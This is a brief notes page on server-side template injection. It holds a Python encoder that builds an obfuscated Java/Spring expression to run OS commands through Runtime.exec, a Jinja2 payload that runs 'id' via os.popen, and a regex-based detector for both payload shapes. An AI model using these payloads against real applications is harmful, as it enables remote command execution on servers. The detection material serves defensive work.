Server Side Template Injection

Server-side template injection allows an attacker to inject template code into a template, whether or not that template already exists. A template engine makes designing HTML pages easier by using static template files in which variables/placeholders are replaced with actual values at runtime.


Cheatsheet:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/README.md

Python script for Java encoder:

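#!/usr/bin/env python3
# Encodes a message as a Java expression with no quoted string literals.
message = input('Enter message to encode:')
# The first character opens the expression; each character is written as its code point.
poc = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
# The remaining characters are appended one by one with .concat().
for ch in message[1:]:
    poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ').getInputStream())}'
print(poc)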

Python SSTI RCE

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
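
A detection-side counterpart to the two payload shapes above, as an added example that is not part of the original page: it URL-decodes request values (including double encoding) and flags the Java type-reference form, the character-code concat chain the encoder emits, and Python dunder traversal inside `{{ }}`. The signature names, regexes and sample values are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures keyed to the two payload shapes shown on this page (names are illustrative).
SIGNATURES = {
    # Expression delimiter wrapping a Java type reference: *{T(java.lang.Runtime)...}
    "java-type-reference": re.compile(r"[*$#]\{[^}]*\bT\(\s*[\w.]+\s*\)", re.S),
    # Characters rebuilt from code points and chained with .concat(): the command
    # text is hidden, but this structure is not.
    "char-code-concat-chain": re.compile(
        r"\.concat\(\s*T\(java\.lang\.Character\)\.toString\(\d+\)\s*\)"),
    # Python object-graph traversal inside a {{ ... }} expression
    "python-dunder-traversal": re.compile(
        r"\{\{.*?__(?:globals|builtins|import|init|class|mro|subclasses)__.*?\}\}", re.S),
}

def decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input is still inspected."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return the sorted names of all signatures the decoded value matches."""
    text = decode(value)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def triage(lines):
    """Map each suspicious line to the signature names it matched."""
    return {line: hits for line in lines if (hits := classify(line))}

# Constructed sample request values (not real traffic).
SAMPLES = [
    "name=alice",
    "name=%7B%7B%20self.__init__.__globals__.__builtins__%20%7D%7D",
    "name=%257B%257B%2520self.__globals__%2520%257D%257D",
    "q=*{T(java.lang.Character).toString(105).concat(T(java.lang.Character).toString(100))}",
    "note={{ total }} USD",
]

if __name__ == "__main__":
    for line, hits in triage(SAMPLES).items():
        print(hits, line)
```

Signature matching like this is a triage aid for logs and WAF rules; the fix is to pass user input to the engine as data and never concatenate it into template source.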
